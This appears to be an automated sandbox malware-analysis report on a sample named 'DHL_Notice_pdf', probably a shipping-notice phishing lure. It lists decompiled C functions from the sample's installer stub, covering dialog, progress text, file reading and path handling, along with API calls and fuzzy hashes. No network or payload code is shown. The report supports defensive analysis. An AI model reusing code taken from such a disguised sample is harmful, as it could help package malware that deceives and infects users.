                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                            • String ID: ('B
                                                            • API String ID: 1495540970-2332581011
                                                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				long _t39;
                                                            				long _t41;
                                                            				void* _t44;
                                                            				signed char _t50;
                                                            				long* _t54;
                                                            
                                                            				if(_a4 + 0xfffffecd > 5) {
                                                            					L18:
                                                            					return 0;
                                                            				}
                                                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                            					goto L18;
                                                            				} else {
                                                            					_t50 = _t54[5];
                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                            						goto L18;
                                                            					}
                                                            					_t39 =  *_t54;
                                                            					if((_t50 & 0x00000002) != 0) {
                                                            						_t39 = GetSysColor(_t39);
                                                            					}
                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                            						SetTextColor(_a8, _t39);
                                                            					}
                                                            					SetBkMode(_a8, _t54[4]);
                                                            					_t41 = _t54[1];
                                                            					_v16.lbColor = _t41;
                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                            						_t41 = GetSysColor(_t41);
                                                            						_v16.lbColor = _t41;
                                                            					}
                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                            						SetBkColor(_a8, _t41);
                                                            					}
                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                            						_v16.lbStyle = _t54[2];
                                                            						_t44 = _t54[3];
                                                            						if(_t44 != 0) {
                                                            							DeleteObject(_t44);
                                                            						}
                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                            					}
                                                            					return _t54[3];
                                                            				}
                                                            			}










                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                            • GetSysColor.USER32(00000000), ref: 00404686
                                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                                            • GetSysColor.USER32(?), ref: 004046B1
                                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                                            • DeleteObject.GDI32(?), ref: 004046DB
                                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                            				intOrPtr _t65;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t72;
                                                            				void* _t76;
                                                            				void* _t79;
                                                            
                                                            				_t72 = __edx;
                                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                            				_t65 = 2;
                                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                            				_t66 = E00402D84(_t65);
                                                            				_t79 = _t66 - 1;
                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                            				if(_t79 < 0) {
                                                            					L36:
                                                            					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                            				} else {
                                                            					__ecx = 0x3ff;
                                                            					if(__eax > 0x3ff) {
                                                            						 *(__ebp - 0x44) = 0x3ff;
                                                            					}
                                                            					if( *__edi == __bx) {
                                                            						L34:
                                                            						__ecx =  *(__ebp - 0xc);
                                                            						__eax =  *(__ebp - 8);
                                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                            						if(_t79 == 0) {
                                                            							 *(_t76 - 4) = 1;
                                                            						}
                                                            						goto L36;
                                                            					} else {
                                                            						 *(__ebp - 0x38) = __ebx;
                                                            						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                            						if( *(__ebp - 0x44) > __ebx) {
                                                            							do {
                                                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                            										__eax = __ebp - 0x50;
                                                            										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                            											goto L34;
                                                            										} else {
                                                            											goto L21;
                                                            										}
                                                            									} else {
                                                            										goto L34;
                                                            									}
                                                            								} else {
                                                            									__eax = __ebp - 0x40;
                                                            									_push(__ebx);
                                                            									_push(__ebp - 0x40);
                                                            									__eax = 2;
                                                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                            									if(__eax == 0) {
                                                            										goto L34;
                                                            									} else {
                                                            										__ecx =  *(__ebp - 0x40);
                                                            										if(__ecx == __ebx) {
                                                            											goto L34;
                                                            										} else {
                                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                            											 *(__ebp - 0x4c) = __ecx;
                                                            											 *(__ebp - 0x50) = __eax;
                                                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                            												L28:
                                                            												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                            											} else {
                                                            												__ebp - 0x50 = __ebp + 0xa;
                                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                            													L21:
                                                            													__eax =  *(__ebp - 0x50);
                                                            												} else {
                                                            													__edi =  *(__ebp - 0x4c);
                                                            													__edi =  ~( *(__ebp - 0x4c));
                                                            													while(1) {
                                                            														_t22 = __ebp - 0x40;
                                                            														 *_t22 =  *(__ebp - 0x40) - 1;
                                                            														__eax = 0xfffd;
                                                            														 *(__ebp - 0x50) = 0xfffd;
                                                            														if( *_t22 == 0) {
                                                            															goto L22;
                                                            														}
                                                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                            														__edi = __edi + 1;
                                                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                            														__eax = __ebp + 0xa;
                                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                            															continue;
                                                            														} else {
                                                            															goto L21;
                                                            														}
                                                            														goto L22;
                                                            													}
                                                            												}
                                                            												L22:
                                                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                            													goto L28;
                                                            												} else {
                                                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                            														} else {
                                                            															__ecx =  *(__ebp - 0xc);
                                                            															__edx =  *(__ebp - 8);
                                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                            														}
                                                            														goto L34;
                                                            													} else {
                                                            														__ecx =  *(__ebp - 0xc);
                                                            														__edx =  *(__ebp - 8);
                                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                            														 *(__ebp - 0x38) = __eax;
                                                            														if(__ax == __bx) {
                                                            															goto L34;
                                                            														} else {
                                                            															goto L26;
                                                            														}
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L37;
                                                            								L26:
                                                            								__eax =  *(__ebp - 8);
                                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                            						}
                                                            						goto L34;
                                                            					}
                                                            				}
                                                            				L37:
                                                            				return 0;
                                                            			}









                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                            • String ID: 9
                                                            • API String ID: 163830602-2366072709
                                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E004068EF(WCHAR* _a4) {
                                                            				short _t5;
                                                            				short _t7;
                                                            				WCHAR* _t19;
                                                            				WCHAR* _t20;
                                                            				WCHAR* _t21;
                                                            
                                                            				_t20 = _a4;
                                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                            					_t20 =  &(_t20[4]);
                                                            				}
                                                            				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                            					_t20 =  &(_t20[2]);
                                                            				}
                                                            				_t5 =  *_t20;
                                                            				_t21 = _t20;
                                                            				_t19 = _t20;
                                                            				if(_t5 != 0) {
                                                            					do {
                                                            						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                            							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                            							_t19 = CharNextW(_t19);
                                                            						}
                                                            						_t20 = CharNextW(_t20);
                                                            						_t5 =  *_t20;
                                                            					} while (_t5 != 0);
                                                            				}
                                                            				 *_t19 =  *_t19 & 0x00000000;
                                                            				while(1) {
                                                            					_push(_t19);
                                                            					_push(_t21);
                                                            					_t19 = CharPrevW();
                                                            					_t7 =  *_t19;
                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                            						break;
                                                            					}
                                                            					 *_t19 =  *_t19 & 0x00000000;
                                                            					if(_t21 < _t19) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				return _t7;
                                                            			}









                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                            • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                            • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-2982765560
                                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040302E(intOrPtr _a4) {
                                                            				short _v132;
                                                            				long _t6;
                                                            				struct HWND__* _t7;
                                                            				struct HWND__* _t15;
                                                            
                                                            				if(_a4 != 0) {
                                                            					_t15 =  *0x420efc;
                                                            					if(_t15 != 0) {
                                                            						_t15 = DestroyWindow(_t15);
                                                            					}
                                                            					 *0x420efc = 0;
                                                            					return _t15;
                                                            				}
                                                            				if( *0x420efc != 0) {
                                                            					return E00406A71(0);
                                                            				}
                                                            				_t6 = GetTickCount();
                                                            				if(_t6 >  *0x42a26c) {
                                                            					if( *0x42a268 == 0) {
                                                            						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                            						 *0x420efc = _t7;
                                                            						return ShowWindow(_t7, 5);
                                                            					}
                                                            					if(( *0x42a314 & 0x00000001) != 0) {
                                                            						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                            						return E004056CA(0,  &_v132);
                                                            					}
                                                            				}
                                                            				return _t6;
                                                            			}








                                                            APIs
                                                            • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                            • GetTickCount.KERNEL32 ref: 00403067
                                                            • wsprintfW.USER32 ref: 00403095
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            • CreateDialogParamW.USER32 ref: 004030B9
                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 722711167-2449383134
                                                            • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                            • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                            				long _v8;
                                                            				signed char _v12;
                                                            				unsigned int _v16;
                                                            				void* _v20;
                                                            				intOrPtr _v24;
                                                            				long _v56;
                                                            				void* _v60;
                                                            				long _t15;
                                                            				unsigned int _t19;
                                                            				signed int _t25;
                                                            				struct HWND__* _t28;
                                                            
                                                            				_t28 = _a4;
                                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                            				if(_a8 == 0) {
                                                            					L4:
                                                            					_v56 = _t15;
                                                            					_v60 = 4;
                                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                            					return _v24;
                                                            				}
                                                            				_t19 = GetMessagePos();
                                                            				_v16 = _t19 >> 0x10;
                                                            				_v20 = _t19;
                                                            				ScreenToClient(_t28,  &_v20);
                                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                            				if((_v12 & 0x00000066) != 0) {
                                                            					_t15 = _v8;
                                                            					goto L4;
                                                            				}
                                                            				return _t25 | 0xffffffff;
                                                            			}















                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                            • GetMessagePos.USER32 ref: 00404FA2
                                                            • ScreenToClient.USER32 ref: 00404FBC
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                            				short _v132;
                                                            				void* _t11;
                                                            				WCHAR* _t19;
                                                            
                                                            				if(_a8 == 0x110) {
                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                            					_a8 = 0x113;
                                                            				}
                                                            				if(_a8 == 0x113) {
                                                            					_t11 = E00403012();
                                                            					_t19 = L"unpacking data: %d%%";
                                                            					if( *0x42a270 == 0) {
                                                            						_t19 = L"verifying installer: %d%%";
                                                            					}
                                                            					wsprintfW( &_v132, _t19, _t11);
                                                            					SetWindowTextW(_a4,  &_v132);
                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                            				}
                                                            				return 0;
                                                            			}







                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                            • wsprintfW.USER32 ref: 00402FE5
                                                            • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                            • SetDlgItemTextW.USER32 ref: 00403007
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                            • API String ID: 1451636040-1158693248
                                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E00402950(void* __ebx) {
                                                            				WCHAR* _t26;
                                                            				void* _t29;
                                                            				long _t37;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				void* _t59;
                                                            				void* _t60;
                                                            				void* _t61;
                                                            
                                                            				_t49 = __ebx;
                                                            				_t52 = 0xfffffd66;
                                                            				_t26 = E00402DA6(0xfffffff0);
                                                            				_t55 = _t26;
                                                            				 *(_t61 - 0x40) = _t26;
                                                            				if(E00405FAE(_t26) == 0) {
                                                            					E00402DA6(0xffffffed);
                                                            				}
                                                            				E00406133(_t55);
                                                            				_t29 = E00406158(_t55, 0x40000000, 2);
                                                            				 *(_t61 + 8) = _t29;
                                                            				if(_t29 != 0xffffffff) {
                                                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                            					if( *(_t61 - 0x28) != _t49) {
                                                            						_t37 =  *0x42a274;
                                                            						 *(_t61 - 0x44) = _t37;
                                                            						_t54 = GlobalAlloc(0x40, _t37);
                                                            						if(_t54 != _t49) {
                                                            							E004035F8(_t49);
                                                            							E004035E2(_t54,  *(_t61 - 0x44));
                                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                            							 *(_t61 - 0x10) = _t59;
                                                            							if(_t59 != _t49) {
                                                            								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                            								while( *_t59 != _t49) {
                                                            									_t51 =  *_t59;
                                                            									_t60 = _t59 + 8;
                                                            									 *(_t61 - 0x3c) =  *_t59;
                                                            									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                            									_t59 = _t60 +  *(_t61 - 0x3c);
                                                            								}
                                                            								GlobalFree( *(_t61 - 0x10));
                                                            							}
                                                            							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                            							GlobalFree(_t54);
                                                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                            						}
                                                            					}
                                                            					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                            					CloseHandle( *(_t61 + 8));
                                                            				}
                                                            				_t56 = 0xfffffff3;
                                                            				if(_t52 < _t49) {
                                                            					_t56 = 0xffffffef;
                                                            					DeleteFileW( *(_t61 - 0x40));
                                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                            				}
                                                            				_push(_t56);
                                                            				E00401423();
                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                            				return 0;
                                                            			}














                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
